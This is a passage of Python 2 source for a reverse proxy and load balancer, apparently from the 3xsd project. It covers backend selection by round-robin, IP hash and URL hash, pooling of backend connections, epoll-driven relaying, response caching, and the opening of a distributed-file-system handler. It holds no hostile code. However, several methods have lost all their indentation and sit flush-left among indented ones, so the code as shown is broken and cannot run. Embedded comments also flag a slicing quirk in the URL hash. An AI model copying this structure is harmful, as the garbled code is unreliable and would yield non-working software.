							self.xResult = self.xR_ERR_HANDLE
					else:
						self.xResult = self.xR_ERR_HANDLE
				elif parse_stat == self.PARSE_AGAIN:
					#incomplete request: wait for more client data
					self.xResult = self.xR_PARSE_AGAIN
					continue
				else:
					self.xResult = self.xR_ERR_PARSE
					#client may closed connection, clean cb_conns
					self.server.cleanc(self._f)
			elif rw_mode == 1:
				#to client, resume_transfer = 1
				#print "1 s->c" #server to client
				self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
				if self.xcache_hit:
					self.x_response()
					_cb = self.server.cb_conns.get(f)
					if _cb:
						_z_sock, _f = _cb
					else:
						_z_sock, _f = self.None2
					if _z_sock:
						#print "xcache_hit clean cb_conns pair:", f, _f
						#response came from cache: retire the paired backend conn
						self.server.z_reqs_cnt[_f] -= 1
						if self.server.z_reqs_cnt[_f] == 0:
							#release z_conn & c_conn pair in cb_conns
							self.server.cb_conns[_f] = None
							self.server.cb_conns[f] = None
						#add idle list
						if str(self.server.zaddrs[_f]) in self.server.zidles:
							if _f not in self.server.zidles[str(self.server.zaddrs[_f])]:
								self.server.zidles[str(self.server.zaddrs[_f])].appendleft(_f)
						else:
							self.server.zidles[str(self.server.zaddrs[_f])] = deque([_f])
						self.server.zconns_stat[_f] = [0, time.time()] #conn idle
						#clean zcache
						self.server.zcache.pop(_f, None)
						self.server.zcache_stat.pop(_f, None)
				else:
					_do_clean = self.z_transfer_client(self._f)
			elif rw_mode == 2:
				#from backend, resume_transfer = 2
				#print "2 b->s" #backend to server
				self.init_handler(self.server.zconns[f], self.server.zaddrs[f], rw_mode)
				parse_stat = self.z_transfer_backend(self._f)
				if parse_stat == self.PARSE_ERROR:
					self.server.cleanz(self._f)
				elif parse_stat == self.PARSE_AGAIN:
					#backend conn became unusable mid-request: retry on a fresh one
					self.z_hostname = self.server.zhosts[self._f]
					self.path = self.server.z_path[self._f]
					self._r = self.server.z_reqs[self._f]
					#print "z_conns", self.server.zconns
					#print "cb_conns", self.server.cb_conns
					#print "idle_zconn", self.server.zidles
					#print f
					_do_clean = False
					_cb = self.server.cb_conns.get(self._f)
					if _cb:
						_client_sock, _client_sock_fileno = _cb
					else:
						_client_sock, _client_sock_fileno = self.None2
					if not _client_sock:
						self.server.epoll.unregister(f)
						self.server.cleanz(self._f)
					else:
						self.server.cleanz(self._f)
						self.z_connect_backend(rw=2, client_sock=_client_sock)
						self.z_send_request_init()
			elif rw_mode == 3:
				#to backend, resume_transfer = 3
				#print "3 s->b" #server to backend
				self.init_handler(self.server.zconns[f], self.server.zaddrs[f], rw_mode)
				_do_clean = self.z_GET_backend()
			else:
				self.xResult = self.xR_ERR_PARSE
			if _do_clean:
				self.transfer_completed = 1
				self.clean()
def z_parse_address(self, addr):
try:
host, port = addr.split(':', 1)
port = int(port)
except:
#return None
return addr, 80
return host, port
	def z_resolve_request_host(self, _hostname):
		"""Resolve a transparently-proxied hostname to 'ip:80'.

		Results are cached in self.tp_host for the ttl configured on the
		'*' record; expired entries are re-resolved in place.
		"""
		#self.tp_host[_hostname] = {'ip', 'expire-time'}
		#transparent hosts's hostname-ip resolve results
		_t = time.time()
		_ttl = self.ttl.get('*')
		if _hostname in self.tp_host:
			if _t > self.tp_host[_hostname]['expire-time']:
				#renew ip
				self.tp_host[_hostname]['ip'] = socket.gethostbyname(_hostname)
				self.tp_host[_hostname]['expire-time'] = _ttl + _t
		else:
			#new resolve
			self.tp_host[_hostname]= {'ip':socket.gethostbyname(_hostname), 'expire-time':_ttl+_t}
		return ''.join([self.tp_host[_hostname]['ip'], ':80'])
	def z_pick_a_backend(self):
		"""Pick one backend address string ("ip:port") for the current request.

		Selection depends on self.z_mode:
		  Z_RR  - round-robin over the host's backend list (self.rra),
		          advancing the per-host counter self.rrn
		  Z_IP  - hash of the client's first three IPv4 octets (/24 block)
		  Z_URL - hash built from hex digits of the request path's md5
		For Z_IP/Z_URL, backends marked down in self.stat are skipped and
		rechecked after their down-TTL expires.  In transparent-proxy mode
		with an unknown hostname the '*' pool is used; the special backend
		'0.0.0.0:0' means "resolve the request host and go direct".
		"""
		if self.transparent_proxy and self.z_hostname not in self.rra.keys():
			z_hostname = '*'
			if self.rra['*'][0] == '0.0.0.0:0':
				#a special backend 0.0.0.0:0 is defined,
				#means that zsd should resolve the request hostname to ip and direct to it
				return self.z_resolve_request_host(self.z_hostname)
		else:
			z_hostname = self.z_hostname
		if self.z_mode == self.Z_RR:
			#round-robin: rotate the backend list, advance counter modulo pool size
			self.z_backends = self.shift(self.rra.get(z_hostname), self.rrn.get(z_hostname))
			self.rrn[z_hostname] = (self.rrn[z_hostname] + 1) % len(self.rra.get(z_hostname))
			return self.z_backends[0]
		elif self.z_mode == self.Z_IP:
			try:
				_ip_peer, _port_peer = self.sock.getpeername()
				_ip_forward = self.in_headers.get('X-Forwarded-For')
				if _ip_forward:
					#get the real peer ip, for what via cache servers
					_ip_peer = _ip_forward.split(',', 1)[0].strip()
			except:
				#peer address unavailable (socket gone): fall back to random pick below
				_ip_peer = b''
			_ips = self.rra.get(z_hostname)
			_ips_n = len(_ips)
			if _ip_peer:
				#ip hash, with c block num
				_ip = _ip_peer.split('.')
				_idx = __idx = (int(_ip[0])*65536 + int(_ip[1])*256 + int(_ip[2]))%_ips_n
				_try = 1
				while self.stat[_ips[_idx]][0] == False:
					#server marked down
					_t = time.time()
					if _t - self.stat[_ips[_idx]][2] > self.stat[_ips[_idx]][1]:
						#expires ttl, will be rechecked
						self.stat[_ips[_idx]][0] = True
						self.stat[_ips[_idx]][2] = _t
						break
					_idx = random.randint(0, _ips_n - 1)
					if _idx == __idx:
						_idx = (_idx + 1) % _ips_n
					_try += 1
					if _try >= _ips_n:
						#tried as many times as there are backends: give up and use it
						break
				return _ips[_idx]
			else:
				return _ips[random.randint(0, _ips_n - 1)]
		elif self.z_mode == self.Z_URL:
			#url hash, with path md5's first 6 hex digist
			#NOTE(review): the [0:1]/[2:3]/[4:5] slices below each take a single
			#char, so only hex digits 0, 2 and 4 are used - confirm intended
			md5 = hashlib.md5()
			md5.update(self.path)
			_path_md5 = md5.hexdigest()
			_ips = self.rra.get(z_hostname)
			_ips_n = len(_ips)
			_idx = __idx = (int(_path_md5[0:1], base=16)*65536 + int(_path_md5[2:3], base=16)*256 + int(_path_md5[4:5], base=16))%_ips_n
			_try = 1
			while self.stat[_ips[_idx]][0] == False:
				#server marked down
				_t = time.time()
				if _t - self.stat[_ips[_idx]][2] > self.stat[_ips[_idx]][1]:
					#expires ttl, will be rechecked
					self.stat[_ips[_idx]][0] = True
					self.stat[_ips[_idx]][2] = _t
					break
				_idx = random.randint(0, _ips_n - 1)
				if _idx == __idx:
					_idx = (_idx + 1) % _ips_n
				_try += 1
				if _try >= _ips_n:
					break
			return _ips[_idx]
def z_GET_backend(self):
#resume send (large)request to backend
self._r = self.server.z_reqs[self._f]
return self.z_send_request_resume(self._r, self._f)
	def z_connect_backend(self, rw=0, client_sock=None, addr=None, update_cb_conns=True):
		"""Connect to a backend server, reusing an idle pooled connection
		when one is available.

		rw: 0 - pair the backend with self.sock; 2 - pair with client_sock.
		addr: explicit (host, port) tuple; if None a backend is picked via
		z_pick_a_backend().  update_cb_conns: register the client<->backend
		socket pair in self.server.cb_conns and mark the backend conn busy.
		On connect failure the backend is marked down in self.stat, a 5xx
		response code is set and self.xResult is set to xR_ERR_5xx.
		After success self._f becomes the backend socket's fileno.
		"""
		#print "connecting to backend" #bbb
		if addr:
			self.z_host_addr = addr
		else:
			self.z_host_addr = self.z_parse_address(self.z_pick_a_backend())
		self.z_host_sock = None
		while str(self.z_host_addr) in self.server.zidles and len(self.server.zidles[str(self.z_host_addr)]) > 0:
			#look for idle connection
			self.z_host_sock = self.server.zconns.get(self.server.zidles[str(self.z_host_addr)].pop(), None)
			_zsfn = self.z_host_sock.fileno()
			if _zsfn == -1 or time.time() - self.server.zconns_stat[_zsfn][1] > self.z_idle_ttl:
				#socket already closed (-1) or idle too long: discard and keep looking
				self.z_host_sock = None
			else:
				break
		if not self.z_host_sock:
			#the idle conn may be closed, make a new connection
			#self.z_host_sock = gevent.socket.create_connection(self.z_host_addr)
			self.z_host_sock = socket.socket()
			self.z_host_sock.settimeout(5)
			try:
				self.z_host_sock.connect(self.z_host_addr)
			except socket.error as e: #ppp
				#mark this backend down with the current timestamp, then map
				#the errno to an appropriate 5xx code for the client
				_addr_s = ''.join([self.z_host_addr[0],':',str(self.z_host_addr[1])])
				self.stat[_addr_s][0] = False
				self.stat[_addr_s][2] = time.time()
				if e.errno == errno.ECONNRESET:
					self.set_resp_code(502)
				elif e.errno == errno.ETIMEDOUT:
					self.set_resp_code(504)
				elif e.errno == errno.ECONNREFUSED:
					self.set_resp_code(503)
				else:
					self.set_resp_code(500)
				self.xResult = self.xR_ERR_5xx
				return
			#non-blocking from here on; enable TCP keepalive probes
			self.z_host_sock.setblocking(0)
			self.z_host_sock.setsockopt(socket.SOL_SOCKET,socket.SO_KEEPALIVE,1)
			self.z_host_sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 20)
			self.z_host_sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 4)
			self.z_host_sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 5)
		#make client-backend socket pair, store them into cb_conns
		#identify backend socket self.z_host_sock with client socket self._f
		if update_cb_conns:
			if rw == 0:
				_c_sock_fileno = self._f
			elif rw == 2:
				_c_sock_fileno = client_sock.fileno()
			self.server.cb_conns[_c_sock_fileno] = [self.z_host_sock, self.z_host_sock.fileno()]
		self._f = self.z_host_sock.fileno()
		#now self._f is backend socket, identidy it with client socket
		if update_cb_conns:
			self.server.zconns_stat[self._f] = [1, -1] #using backend connection
			if rw == 0:
				self.server.cb_conns[self._f] = [self.sock, self.sock.fileno()]
			elif rw == 2:
				self.server.cb_conns[self._f] = [client_sock, client_sock.fileno()]
		#print "z_connect_backend create cb_conns pair:", _c_sock_fileno, self._f
		#print "cb_conns:", self.server.cb_conns
		#print "get zconn:", self._f
		#print "self.sock:", self.sock
		#register the backend socket under its fileno for later lookups
		self.server.zconns[self._f] = self.z_host_sock
		self.server.zaddrs[self._f] = self.z_host_addr
		self.server.zhosts[self._f] = self.z_hostname
	def z_send_request_init(self, no_recv=False):
		"""Start sending the buffered request self._r to the backend.

		Sends at most half the send buffer in one call; if the request
		does not fit (or the send was short), records progress in
		self.server.z_reqs_stat and arms EPOLLOUT so z_send_request_resume
		can continue later.  no_recv=True means no response is expected
		(used for redundant DFS writes): the connection is closed and
		deregistered once everything was sent in one shot.
		Returns self.PARSE_ERROR on a socket error, None otherwise.
		"""
		#init send request, _r for request headers, _f for socket fileno to backend
		self.server.z_reqs[self._f] = self._r
		#self.server.z_resp_header[self._f] = None
		self.server.z_path[self._f] = self.path
		#if no_recv:
		#	self.z_host_sock.shutdown(socket.SHUT_RD)
		try:
			if len(self._r) > self.send_buf_size/2:
				_buf_size = self.send_buf_size/2
				_once = False
			else:
				_buf_size = len(self._r)
				_once = True
			sent = self.z_host_sock.send(self._r[:_buf_size])
			if sent < _buf_size:
				#short send: must resume later even though it fit the buffer
				_once = False
			if not _once:
				self.server.z_reqs_stat[self._f] = [sent, no_recv]
				try:
					self.server.epoll.register(self._f, select.EPOLLIN | select.EPOLLOUT)
				except IOError as e:
					#already registered: just update the event mask
					self.server.epoll.modify(self._f, select.EPOLLIN | select.EPOLLOUT)
				except:
					raise
			else:
				if self._f in self.server.z_reqs_stat:
					self.server.z_reqs_stat.pop(self._f)
				try:
					self.server.epoll.register(self._f, select.EPOLLIN)
				except IOError as e:
					self.server.epoll.modify(self._f, select.EPOLLIN)
				except:
					raise
		except socket.error as e:
			return self.PARSE_ERROR
		except:
			raise
		if no_recv:
			#_once is always bound here: any exception path above returned or raised
			if _once:
				try:
					self.server.epoll.unregister(self._f)
				except:
					raise
				self.z_host_sock.close()
				self.server.zconns.pop(self._f)
				self.server.zaddrs.pop(self._f)
				self.server.zhosts.pop(self._f)
		else:
			#count outstanding requests expecting a response on this conn
			if self._f in self.server.z_reqs_cnt:
				self.server.z_reqs_cnt[self._f] += 1
			else:
				self.server.z_reqs_cnt[self._f] = 1
	def z_send_request_resume(self, _r, _f):
		"""Continue a partially-sent request _r on backend fd _f.

		Progress lives in self.server.z_reqs_stat[_f] = [bytes_sent,
		no_recv].  Sends up to half the send buffer per call; once all
		bytes are out, either switches epoll back to EPOLLIN (a response
		is expected) or, for no_recv connections, closes and deregisters
		the backend socket.  Always returns False.
		"""
		#resume request sending
		if _f in self.server.z_reqs_stat:
			begin, no_recv = self.server.z_reqs_stat[_f]
			if len(_r[begin:]) > self.send_buf_size/2:
				_buf_size = self.send_buf_size/2
			else:
				_buf_size = len(_r[begin:])
			sent = self.z_host_sock.send(_r[begin:begin+_buf_size])
			if begin + sent < len(_r):
				self.server.z_reqs_stat[_f] = [begin + sent, no_recv]
			else:
				#all sent
				self.server.z_reqs_stat.pop(_f)
				if not no_recv:
					self.server.epoll.modify(_f, select.EPOLLIN)
				else:
					#NOTE(review): the cleanup below uses self._f while the rest
					#of this method uses the _f parameter - in the visible caller
					#(z_GET_backend) they are the same value; confirm for others
					try:
						self.server.epoll.unregister(self._f)
					except:
						pass
					self.z_host_sock.close()
					self.server.zconns.pop(self._f)
					self.server.zaddrs.pop(self._f)
					self.server.zhosts.pop(self._f)
		return False
	def z_GET_init(self):
		"""Handle a client GET: pick/reuse a backend connection for the
		request's Host and send the request.

		Reuses the existing paired backend connection when it serves the
		same hostname, otherwise dials a new one via z_connect_backend().
		Sets self.xResult to xR_ERR_HANDLE when the hostname is not
		served (and not in transparent-proxy mode) or on any error.
		"""
		#init connection to backend, send request, ggg
		_f = None
		try:
			self.z_hostname, _port = self.z_parse_address(self.in_headers.get("Host").lower())
			if self.z_hostname not in self.rra.keys() and not self.transparent_proxy:
				#not my serving hostname
				self.xResult = self.xR_ERR_HANDLE
				return
			_cb = self.server.cb_conns.get(self._f)
			if _cb:
				self.z_host_sock, _f = _cb
			else:
				self.z_host_sock, _f = self.None2
			if _f and self.server.zhosts.get(_f, None) == self.z_hostname:
				#print "z_GET_init remake cb_conns pair:", self._f, _f
				#existing backend conn already talks to this hostname: reuse it
				self._f = _f
				self.server.cb_conns[_f] = [self.sock, self.sock.fileno()]
			else:
				#print "z_GET_init new conn:", self._f, _f
				self.z_connect_backend()
				_f = self._f
			if self.xResult == self.xR_ERR_5xx:
				#backend connect failed; error response already prepared
				return
			self.z_send_request_init()
		except:
			self.xResult = self.xR_ERR_HANDLE
	def z_transfer_client(self, __f):
		"""Push buffered backend response data to the client socket __f.

		Response blocks live in self.server.zcache[_f] with progress in
		self.server.zcache_stat[_f] = [blockno, offset_in_block, ...]
		(see z_transfer_backend for the full stat layout).  Returns True
		when the whole response has been delivered (and the backend conn
		was returned to the idle pool / caches updated), False otherwise.
		"""
		#to client 222
		_cb = self.server.cb_conns.get(__f)
		if _cb:
			_c, _f = _cb
		else:
			_c, _f = self.None2
		if _f not in self.server.zcache_stat:
			return False
		blockno, begin = self.server.zcache_stat[_f][:2]
		if blockno == len(self.server.zcache[_f]):
			#all received blocks have been sent
			if self.server.zcache_stat[_f][4] == 1:
				#finished all sent
				self.server.epoll.modify(self.sock, select.EPOLLIN)
				if self.server.zcache_stat[_f][7] == self.HTTP_OK:
					if self.server.zcache_stat[_f][10] == 1 or self.server.zcache_stat[_f][5] > 0:
						#only 200 and chuncked or body_size > 0 response item moved to xcache
						#here may be wrong, should use self.cmd_get instead of self.server.zcache_stat[_f][5]
						self.zcache_to_xcache(_f)
				self.server.z_reqs_cnt[_f] -= 1
				if self.server.z_reqs_cnt[_f] == 0:
					#release z_conn & c_conn pair in cb_conns
					#print "z_transfer_client clean cb_conns pair:", __f, _f
					self.server.cb_conns[__f] = None
					self.server.cb_conns[_f] = None
				_backend_sock = self.server.zconns.get(_f)
				if _backend_sock:
					if _backend_sock.fileno() == -1:
						#backend closed connection
						self.server.zconns.pop(_f)
						self.server.zconns_stat.pop(_f)
					else:
						#add idle list
						if str(self.server.zaddrs[_f]) in self.server.zidles:
							if _f not in self.server.zidles[str(self.server.zaddrs[_f])]:
								#add to idle list
								self.server.zidles[str(self.server.zaddrs[_f])].appendleft(_f)
						else:
							self.server.zidles[str(self.server.zaddrs[_f])] = deque([_f])
						self.server.zconns_stat[_f] = [0, time.time()] #conn idle
				#clean zcache
				self.server.zcache.pop(_f)
				self.server.zcache_stat.pop(_f)
				#self.server.z_path.pop(_f)
				#finished
				return True
			else:
				#no more data yet or finished with no Content-Length? that's a problem.
				_backend_sock = self.server.zconns.get(_f)
				if _backend_sock:
					if _backend_sock.fileno() == -1:
						#backend gone: treat everything received so far as the body
						self.server.zcache_stat[_f][5] = self.server.zcache_stat[_f][2] - self.server.zcache_stat[_f][3]
						self.server.zcache_stat[_f][4] = 1
				return False
		if len(self.server.zcache[_f][blockno][begin:]) > self.send_buf_size:
			#block larger than the send buffer: send a buffer-sized slice
			sent = self.sock.send(self.server.zcache[_f][blockno][begin:begin + self.send_buf_size])
			should_sent = self.send_buf_size
			self.server.zcache_stat[_f][1] += sent
		else:
			sent = self.sock.send(self.server.zcache[_f][blockno][begin:])
			should_sent = len(self.server.zcache[_f][blockno][begin:])
			if sent < should_sent:
				#short send: stay on this block, advance the offset only
				self.server.zcache_stat[_f][1] += sent
			else:
				#block fully sent: move to the next one
				self.server.zcache_stat[_f][0] += 1
				self.server.zcache_stat[_f][1] = 0
		#print "sent block:", blockno, sent, len(self.server.zcache[_f][blockno]), self.send_buf_size
		#print "zcache_stat:", self.server.zcache_stat[_f]
		return False
def zcache_to_xcache(self, _f):
#remember that only 200 and body_size > 0 response item will be moved to xcache
_cc = self.server.z_resp_header[_f].get('Cache-Control')
_exp = self.server.z_resp_header[_f].get('Expires')
_ttl = 0
_t = time.time() #now
if _cc:
if "private" in _cc or "no-cache" in _cc:
_ttl = -1
elif "max-age=" in _cc:
_age_s = ''
_index = _cc.find('max-age=') + len('max-age=')
while _cc[_index] in ['1','2','3','4','5','6','7','8','9','0']:
_age_s = ''.join([_age_s, _cc[_index]])
_index += 1
if _index > len(_cc) - 1:
break
_ttl = _t + int(_age_s)
else:
if _exp:
#Expires: Tue, 20 Oct 2015 04:27:25 GMT
_ttl = calendar.timegm(time.strptime(_exp, '%a, %d %b %Y %H:%M:%S GMT'))
else:
_ttl = self.xcache_ttl + _t
else:
if _exp:
_ttl = calendar.timegm(time.strptime(_exp, '%a, %d %b %Y %H:%M:%S GMT'))
else:
_ttl = self.xcache_ttl + _t
if _ttl > _t:
if len(self.server.xcache) > self.z_cache_size:
self.server.xcache.popitem()
try:
self.server.z_resp_header[_f].pop("Connection")
except:
pass
self.out_head_s = ''.join(['\n'.join(['%s: %s' % (k, v) for k, v in self.server.z_resp_header[_f].items()]), '\n'])
_resp = ''.join(self.server.zcache[_f])
self.out_body_file = _resp[self.server.zcache_stat[_f][3]:]
self.out_body_size = len(self.out_body_file)
_xcache_key = b''
_content_encoding = self.server.z_resp_header[_f].get('Content-Encoding')
if _content_encoding:
_xcache_key = ''.join([_content_encoding, ':', self.server.zcache_stat[_f][9],self.server.zcache_stat[_f][8]])
else:
_xcache_key = ''.join([self.server.zcache_stat[_f][9],self.server.zcache_stat[_f][8]])
self.server.xcache[_xcache_key] = [_ttl, self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap]
if self.z_xcache_shelf:
try:
if len(self.server.xcache_shelf) > self.z_shelf_size:
if hasattr(self.server.xcache_shelf.dict, 'first'):
#dbhash format
k, v = self.server.xcache_shelf.dict.first()
with self.server.xcache_shelf_lock:
del self.server.xcache_shelf[k]
if hasattr(self.server.xcache_shelf.dict, 'firstkey'):
#gdbm format
with self.server.xcache_shelf_lock:
del self.server.xcache_shelf[self.server.xcache_shelf.dict.firstkey()]
except:
pass
try:
#moved to self.server.check_lbs
#while len(self.server.xcache_shelf.cache) > self.z_cache_size:
# self.server.xcache_shelf.cache.popitem()
with self.server.xcache_shelf_lock:
self.server.xcache_shelf[_xcache_key] = self.server.xcache[_xcache_key]
#moved to self.server.check_lbs
#if hasattr(self.server.xcache_shelf.dict, 'sync'):
# #self.server.xcache.dict is an anydbm object, mostly gdbm
# self.server.xcache_shelf.dict.sync()
except:
#may be problem in concurrent mode
pass
	def z_transfer_backend(self, _f):
		"""Receive response data from backend fd _f into the zcache.

		On the first chunk, parses the response headers (when the header
		terminator is present) and initializes zcache_stat[_f]; subsequent
		chunks are appended and completion is detected via Content-Length
		or the chunked-encoding terminator.  Returns PARSE_OK when the
		response is complete, PARSE_MORE when more data is expected,
		PARSE_AGAIN to retry, PARSE_ERROR on a fatal socket error.
		"""
		#from backend
		try:
			_b = self.z_host_sock.recv(self.recv_buf_size)
			if not _b:
				#peer closed connection?
				#print "no content recieved, trying reconnect"
				return self.PARSE_AGAIN
		except socket.error as e:
			if e.errno == errno.EAGAIN:
				#no more request data, see if the whole request headers should be recieved
				return self.PARSE_AGAIN
			else:
				#peer closed connection?
				#return self.PARSE_AGAIN
				return self.PARSE_ERROR
		#self.server.zcache_stat[_f] sample:
		#[2, 0, 25230, 217, 0, 25013, 1, 200, '/py/vms_rrd/vms-ping_day.png', 'vm0']
		if _f in self.server.zcache and self.server.zcache_stat[_f][4] == 0 and self.z_finished == 0:
			#continue recv
			"""
			self.server.zcache_stat[_f][2] total_size_recv
			self.server.zcache_stat[_f][3] header_length
			self.server.zcache_stat[_f][4] finished
			self.server.zcache_stat[_f][5] body_size
			self.server.zcache_stat[_f][6] keep_connection
			self.server.zcache_stat[_f][7] http_status_code
			self.server.zcache_stat[_f][8] path
			self.server.zcache_stat[_f][9] hostname
			self.server.zcache_stat[_f][10] chuncked encoding
			"""
			self.server.zcache[_f].append(_b)
			self.server.zcache_stat[_f][2] += len(_b)
			if not self.response_headers_parsed:
				if self.EOL2 in _b or self.EOL1 in _b:
					#rebuild the response headers and check them
					self.parse_backend_response_headers(''.join(self.server.zcache[_f]), _f)
					self.server.zcache_stat[_f][3] = self.z_header_length
					self.server.zcache_stat[_f][6] = self.keep_connection
					self.server.zcache_stat[_f][7] = self.resp_code
					if self.response_headers_parsed:
						#headers complete now: wake the paired client socket up
						_cb = self.server.cb_conns.get(_f)
						if _cb:
							_c_sock, _c_sock_no = _cb
						else:
							_c_sock, _c_sock_no = self.None2
						if _c_sock:
							if _c_sock_no in self.server.xcache_stat:
								#clear xcache_stat to avoid cache hit before
								self.server.xcache_stat.pop(_c_sock_no, None)
							self.server.epoll.modify(_c_sock, select.EPOLLIN | select.EPOLLOUT)
			if self.server.zcache_stat[_f][5] > 0:
				if self.server.zcache_stat[_f][2] == self.server.zcache_stat[_f][5] + self.server.zcache_stat[_f][3]:
					#finished content-length
					self.server.zcache_stat[_f][4] = 1
					self.z_finished = 1
			elif self.server.zcache_stat[_f][5] == 0 and "0\r\n\r\n" in _b:
				#finished chunked encoding
				self.server.zcache_stat[_f][4] = 1
				self.z_finished = 1
		elif self.z_finished == 0:
			#first recv
			_path = self.server.z_path[_f]
			_z_hostname = self.server.zhosts[_f]
			self.server.zcache[_f] = [_b]
			#zcache_stat format: [block num, size sent, total_size_recv, header_length, finished, body_size, keep_connection,resp_code,path,hostname,chuncked_encoding]
			if self.EOL2 in _b or self.EOL1 in _b:
				self.parse_backend_response_headers(_b, _f)
				self.server.zcache_stat[_f] = [0, 0, len(_b), self.z_header_length, self.z_finished, self.z_body_size, self.keep_connection, self.resp_code, _path, _z_hostname, self.chuncked_encoding]
			else:
				#headers incomplete: placeholder stat until the terminator arrives
				self.server.zcache_stat[_f] = [0, 0, len(_b), -1, 0, -1, -1, 0, _path, _z_hostname, self.chuncked_encoding]
			if self.response_headers_parsed:
				_cb = self.server.cb_conns.get(_f)
				if _cb:
					_c_sock, _c_sock_no = _cb
				else:
					_c_sock, _c_sock_no = self.None2
				if _c_sock:
					if _c_sock_no in self.server.xcache_stat:
						#clear xcache_stat to avoid cache hit before
						self.server.xcache_stat.pop(_c_sock_no, None)
					self.server.epoll.modify(_c_sock, select.EPOLLIN | select.EPOLLOUT)
				#else:
					#at this point, the last request of client should completed and cb_conns cleaned
					#may be safe to ignore it, but if this request is different from the last? ....
					#print "cb_conns:", self.server.cb_conns
					#print "f:", _f, "zcache_stat:", self.server.zcache_stat, "z_reqs_cnt:", self.server.z_reqs_cnt
		if self.z_finished == 1:
			self.server.epoll.unregister(_f)
			return self.PARSE_OK
		else:
			return self.PARSE_MORE
def parse_backend_response_headers(self, _b, _f):
#cut headers out
b = _b.split(self.EOL2, 1)
sp = len(self.EOL2)
if not b[0]:
b = _b.split(self.EOL1, 1)
sp = len(self.EOL1)
if not b[0]:
#illeagal response headers
return self.PARSE_ERROR
self.z_header_length = len(b[0]) + sp
a = b[0].strip().split("\r\n", 1)
if not a[0]:
return self.PARSE_ERROR
#"HTTP/1.1 200 OK"
_c_http_ver, _resp_code_str, self.resp_msg = a[0].split(None, 2)
self.resp_code = int(_resp_code_str)
if self.resp_code == self.HTTP_OK:
self.has_resp_body = True
self.server.z_resp_header[_f] = dict((k, v) for k, v in (item.split(": ") for item in a[1].split("\r\n")))
self.in_headers = dict((k, v) for k, v in (item.split(": ") for item in a[1].split("\r\n")))
try:
self.z_finished = 0
cl = self.in_headers.get("Content-Length")
if cl:
self.z_body_size = int(cl)
if len(b[1]) == self.z_body_size:
self.z_finished = 1
else:
c1 = self.in_headers.get("Transfer-Encoding")
if c1:
if c1.lower()== "chunked":
self.chuncked_encoding = 1
self.z_body_size = 0
if "0\r\n\r\n" in b[1]:
self.z_finished = 1
else:
self.z_body_size = -1
else:
if self.z_host_sock.fileno() == -1:
#backend closed connection, transfer finished
self.z_body_size = len(_b) - self.z_header_length
self.z_finished = 1
elif self.resp_code > self.HTTP_OK:
self.z_body_size = 0
self.z_finished = 1
else:
self.z_body_size = 0
except:
self.z_body_size = -1
self.z_finished = 0
self.check_connection(_c_http_ver, check_ims=False, gen_xcache_key=False)
self.response_headers_parsed = True
self.server.k_conns[_f] = [self.r_http_ver, self.keep_connection]
#mangle the http status line and "Connection:" header to fit client side
#_b = self.server.zcache[_f][0] #headers in block 0
#print "_f:", _f, "cb_conns:", self.server.cb_conns, "k_conns", self.server.k_conns
try:
__rc_http_ver, _c_keep_connection = self.server.k_conns[self.server.cb_conns[_f][1]]
if __rc_http_ver == 1:
_rc_http_ver = "HTTP/1.1"
else:
_rc_http_ver = "HTTP/1.0"
except:
_rc_http_ver = "HTTP/1.0"
_c_keep_connection = 0
if _c_http_ver != _rc_http_ver:
if "HTTP/1.1" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("HTTP/1.1", "HTTP/1.0", 1)
elif "HTTP/1.0" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("HTTP/1.0", "HTTP/1.1", 1)
if _c_keep_connection != self.keep_connection:
if "Connection: keep-alive" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("Connection: keep-alive", "Connection: close", 1)
self.z_header_length -= 5
elif "Connection: close" in self.server.zcache[_f][0]:
self.server.zcache[_f][0] = self.server.zcache[_f][0].replace("Connection: close", "Connection: keep-alive", 1)
self.z_header_length += 5
def out_conns_stats(self):
print "--------------------------------------------------------------------------"
print "zconns:", self.server.zconns
print "zconns_stat:", self.server.zconns_stat
print "zidles:", self.server.zidles
print "cb_conns:", self.server.cb_conns
print "--------------------------------------------------------------------------"
	def check_zconns(self):
		"""Background housekeeping loop: every 10 seconds, close backend
		connections idle longer than self.z_idle_ttl and remove them from
		the idle deques and the server's connection tables (via cleanz).
		Runs forever; intended to be spawned as a gevent task."""
		while 1:
			gevent.sleep(10)
			#.keys() snapshots the fds, so cleanz() below may mutate the dict
			for f in self.server.zconns.keys():
				if f in self.server.zconns_stat:
					_t = self.server.zconns_stat[f][1]
					if time.time() - _t > self.z_idle_ttl:
						#idle time out, clean it
						if self.server.zidles:
							for _host in self.server.zidles.keys():
								if self.server.zidles[_host]:
									try:
										#drop f from whichever idle deque holds it
										self.server.zidles[_host].remove(f)
									except:
										pass
						_sock = self.server.zconns[f]
						self.server.cleanz(f)
						_sock.close()
class _xDFSHandler(_xZHandler):
	"""3fsd distributed-file-system handler built on the zsd LB handler.

	URLs of the form /<prefix>_<stage>/path/to/file are mapped onto
	backend pools by hashing the path's md5 into a fixed hash region
	(dfs_locate_backend); dfs_redundancy replicas are kept on distinct
	servers.  PUT/DELETE is restricted to the configured writer IPs.
	"""
	DFS_PROXY_MODE = 0
	DFS_DIRECT_MODE = 1
	d_mode = 0
	#parsed 3xsd.conf [3fsd] section
	dfs_config = None
	dfs_stage = 0
	#number of replicas per file
	dfs_redundancy = 1
	#hash region size; dfs_region_mask hex digits cover it
	dfs_region = 4096
	dfs_prefix = '_3fs'
	dfs_prefix_s = '/_3fs_'
	#dfs_pool[hostname][stage] -> sorted backend list
	dfs_pool = {}
	dfs_pool_count = {}
	#client IPs allowed to PUT/DELETE
	dfs_writer = []
	file_stage = 0
	file_path = b''
	file_md5 = b''
	peer_ip_s = b''
	def __init__(self, conn, client_address, server, native_epoll=True,
					gevent_stream=False, recv_buf_size=16384, send_buf_size=65536, d_mode=0):
		"""Initialize the base zsd handler (z_mode -1) and load DFS config."""
		_xZHandler.__init__(self, conn, client_address, server, native_epoll, gevent_stream,
								recv_buf_size, send_buf_size, -1)
		self.init_dfs_config()
		self.d_mode = d_mode
	def init_dfs_config(self):
		"""Parse the [3fsd] section of 3xsd.conf (or /etc/3xsd.conf) into
		the stage/redundancy/region/prefix settings, the per-hostname
